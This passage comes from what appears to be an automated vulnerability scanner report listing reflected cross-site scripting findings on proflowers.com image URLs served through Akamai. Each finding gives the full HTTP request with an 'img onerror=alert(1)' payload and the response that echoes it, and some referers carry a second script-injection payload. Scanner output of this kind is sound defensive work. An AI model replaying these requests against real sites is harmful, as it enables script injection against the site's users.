GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkroseblucampanula_victin10_2_PF962c9<img%20src%3da%20onerror%3dalert(1)>9f2e498f529?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 115
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:13 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inpnkroseblucampanula_victin10_2_PF962c9<img src=a onerror=alert(1)>9f2e498f529

4.124. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpurpazalea_sqbsktgrn09_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpurpazalea_sqbsktgrn09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 1aae3<img%20src%3da%20onerror%3dalert(1)>6ccde723029 was submitted in the REST URL parameter 9. This input was echoed as 1aae3<img src=a onerror=alert(1)>6ccde723029 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpurpazalea_sqbsktgrn09_PF1aae3<img%20src%3da%20onerror%3dalert(1)>6ccde723029?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:00 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inpurpazalea_sqbsktgrn09_PF1aae3<img src=a onerror=alert(1)>6ccde723029

4.125. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3be1c<img%20src%3da%20onerror%3dalert(1)>33e58a7dff5 was submitted in the REST URL parameter 9. This input was echoed as 3be1c<img src=a onerror=alert(1)>33e58a7dff5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF3be1c<img%20src%3da%20onerror%3dalert(1)>33e58a7dff5?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:06 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF3be1c<img src=a onerror=alert(1)>33e58a7dff5

4.126. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inrosylwurn_victin10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inrosylwurn_victin10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload da54c<img%20src%3da%20onerror%3dalert(1)>2d8a02251de was submitted in the REST URL parameter 9. This input was echoed as da54c<img src=a onerror=alert(1)>2d8a02251de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inrosylwurn_victin10_PFda54c<img%20src%3da%20onerror%3dalert(1)>2d8a02251de?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:13 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inrosylwurn_victin10_PFda54c<img src=a onerror=alert(1)>2d8a02251de

4.127. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6insucculent_zinc09_l [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6insucculent_zinc09_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload fb488<img%20src%3da%20onerror%3dalert(1)>9985bf4a860 was submitted in the REST URL parameter 9. This input was echoed as fb488<img src=a onerror=alert(1)>9985bf4a860 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6insucculent_zinc09_lfb488<img%20src%3da%20onerror%3dalert(1)>9985bf4a860?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:54 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6insucculent_zinc09_lfb488<img src=a onerror=alert(1)>9985bf4a860

4.128. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inwhtazalea_crmurn11_PC1080_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inwhtazalea_crmurn11_PC1080_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2bf12<img%20src%3da%20onerror%3dalert(1)>307ef96990b was submitted in the REST URL parameter 9. This input was echoed as 2bf12<img src=a onerror=alert(1)>307ef96990b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inwhtazalea_crmurn11_PC1080_PF2bf12<img%20src%3da%20onerror%3dalert(1)>307ef96990b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 110
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:05 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inwhtazalea_crmurn11_PC1080_PF2bf12<img src=a onerror=alert(1)>307ef96990b

4.129. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT8inspath_wdtpr09_l [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT8inspath_wdtpr09_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9953a<img%20src%3da%20onerror%3dalert(1)>0606794631f was submitted in the REST URL parameter 9. This input was echoed as 9953a<img src=a onerror=alert(1)>0606794631f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT8inspath_wdtpr09_l9953a<img%20src%3da%20onerror%3dalert(1)>0606794631f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 97
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:56 GMT
Connection: close

Unable to find /ProvideCommerce/PLT8inspath_wdtpr09_l9953a<img src=a onerror=alert(1)>0606794631f

4.130. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT_8inwhpot_PC1795_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT_8inwhpot_PC1795_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 93ba9<img%20src%3da%20onerror%3dalert(1)>0ab92364043 was submitted in the REST URL parameter 9. This input was echoed as 93ba9<img src=a onerror=alert(1)>0ab92364043 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT_8inwhpot_PC1795_SQ93ba9<img%20src%3da%20onerror%3dalert(1)>0ab92364043?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:12:34 GMT
Connection: close

Unable to find /ProvideCommerce/PLT_8inwhpot_PC1795_SQ93ba9<img src=a onerror=alert(1)>0ab92364043

4.131. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTangeltree10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTangeltree10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 6afb8<img%20src%3da%20onerror%3dalert(1)>a4c35050e8d was submitted in the REST URL parameter 9. This input was echoed as 6afb8<img src=a onerror=alert(1)>a4c35050e8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTangeltree10_PF6afb8<img%20src%3da%20onerror%3dalert(1)>a4c35050e8d?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:58 GMT
Connection: close

Unable to find /ProvideCommerce/PLTangeltree10_PF6afb8<img src=a onerror=alert(1)>a4c35050e8d

4.132. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTazaleabons10_bloom_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTazaleabons10_bloom_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f3028<img%20src%3da%20onerror%3dalert(1)>05cd2cada1f was submitted in the REST URL parameter 9. This input was echoed as f3028<img src=a onerror=alert(1)>05cd2cada1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTazaleabons10_bloom_PFf3028<img%20src%3da%20onerror%3dalert(1)>05cd2cada1f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:00 GMT
Connection: close

Unable to find /ProvideCommerce/PLTazaleabons10_bloom_PFf3028<img src=a onerror=alert(1)>05cd2cada1f

4.133. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTgdnabonsai2_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTgdnabonsai2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9510f<img%20src%3da%20onerror%3dalert(1)>aefbe9bcc3 was submitted in the REST URL parameter 9. This input was echoed as 9510f<img src=a onerror=alert(1)>aefbe9bcc3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTgdnabonsai2_PF9510f<img%20src%3da%20onerror%3dalert(1)>aefbe9bcc3?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 92
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:58 GMT
Connection: close

Unable to find /ProvideCommerce/PLTgdnabonsai2_PF9510f<img src=a onerror=alert(1)>aefbe9bcc3

4.134. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThibiscus_dkbsktyel09_l [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThibiscus_dkbsktyel09_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload daa33<img%20src%3da%20onerror%3dalert(1)>f1e0c05c9d7 was submitted in the REST URL parameter 9. This input was echoed as daa33<img src=a onerror=alert(1)>f1e0c05c9d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThibiscus_dkbsktyel09_ldaa33<img%20src%3da%20onerror%3dalert(1)>f1e0c05c9d7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:56 GMT
Connection: close

Unable to find /ProvideCommerce/PLThibiscus_dkbsktyel09_ldaa33<img src=a onerror=alert(1)>f1e0c05c9d7

4.135. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_pinkceramic11_PC1939_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_pinkceramic11_PC1939_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload bab1d<img%20src%3da%20onerror%3dalert(1)>753a0dd4198 was submitted in the REST URL parameter 9. This input was echoed as bab1d<img src=a onerror=alert(1)>753a0dd4198 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_pinkceramic11_PC1939_PFbab1d<img%20src%3da%20onerror%3dalert(1)>753a0dd4198?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 111
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:08 GMT
Connection: close

Unable to find /ProvideCommerce/PLThrtbmboo_pinkceramic11_PC1939_PFbab1d<img src=a onerror=alert(1)>753a0dd4198

4.136. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTluckybamboo_chinesetakeout11_PC1858_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTluckybamboo_chinesetakeout11_PC1858_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 7a739<img%20src%3da%20onerror%3dalert(1)>19e4b46ec9b was submitted in the REST URL parameter 9. This input was echoed as 7a739<img src=a onerror=alert(1)>19e4b46ec9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTluckybamboo_chinesetakeout11_PC1858_PF7a739<img%20src%3da%20onerror%3dalert(1)>19e4b46ec9b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 117
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:04 GMT
Connection: close

Unable to find /ProvideCommerce/PLTluckybamboo_chinesetakeout11_PC1858_PF7a739<img src=a onerror=alert(1)>19e4b46ec9b

4.137. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLUMdayBearGodiva_FCB_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLUMdayBearGodiva_FCB_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload eb0f5<img%20src%3da%20onerror%3dalert(1)>e862abd4ade was submitted in the REST URL parameter 9. This input was echoed as eb0f5<img src=a onerror=alert(1)>e862abd4ade in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLUMdayBearGodiva_FCB_PFeb0f5<img%20src%3da%20onerror%3dalert(1)>e862abd4ade?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:58 GMT
Connection: close

Unable to find /ProvideCommerce/PLUMdayBearGodiva_FCB_PFeb0f5<img src=a onerror=alert(1)>e862abd4ade

4.138. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 58402<img%20src%3da%20onerror%3dalert(1)>acc34c808be was submitted in the REST URL parameter 9. This input was echoed as 58402<img src=a onerror=alert(1)>acc34c808be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_PF58402<img%20src%3da%20onerror%3dalert(1)>acc34c808be?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:00 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12red50_rbye11_PF58402<img src=a onerror=alert(1)>acc34c808be

4.139. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assorted50_grn10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assorted50_grn10_PF

Issue detail

